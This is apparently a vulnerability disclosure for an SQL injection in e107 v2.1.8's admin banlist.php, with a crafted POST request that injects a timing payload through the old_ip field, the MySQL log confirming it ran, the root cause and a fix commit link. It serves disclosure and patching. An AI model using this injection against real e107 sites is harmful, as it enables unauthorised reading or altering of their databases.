e107 v2.1.8 contains a flaw that may allow carrying out an SQL injection attack. The issue is due to the /e107_admin/banlist.php script not properly escaping input to the old_ip parameter. This may allow a remote attacker to inject or manipulate SQL queries in the database, allowing for the manipulation or disclosure of arbitrary data.
- Login to the admin page. (
/e107_admin/admin.php) - Send a POST request to
/e107_admin/banlist.phpand use BurpSuite to rewrite parameters as follows.
POST /e107/e107_admin/banlist.php HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryREEvpmFYBJa0wazD
Cookie: my_cookie=***********************
Content-Length: 464
------WebKitFormBoundaryREEvpmFYBJa0wazD
Content-Disposition: form-data; name="entry_intent"
dummy
------WebKitFormBoundaryREEvpmFYBJa0wazD
Content-Disposition: form-data; name="update_ban"
dummy
------WebKitFormBoundaryREEvpmFYBJa0wazD
Content-Disposition: form-data; name="ban_ip"
dummy
------WebKitFormBoundaryREEvpmFYBJa0wazD
Content-Disposition: form-data; name="old_ip"
'; SELECT SLEEP(10) --'
------WebKitFormBoundaryREEvpmFYBJa0wazD--
- It takes 10 seconds or more for the response to come back.
This means that an SQL query SELECT SLEEP(10) set to old_ip was executed on the server.
This is mysql's query log.
2018-07-31T01:44:07.412204Z 27 Query UPDATE e107_banlist SET `banlist_ip`='dummy', `banlist_admin`='1', `banlist_reason`='', `banlist_notes`='' WHERE banlist_ip='';
2018-07-31T01:44:07.412445Z 27 Query SELECT SLEEP(10) --''
The cause of the vulnerability is in this line.
$_POST['old_ip'] is concatenated without properly escaping.
https://github.com/e107inc/e107/commit/ec483e9379aa622bfcc1b853b189c74288771f27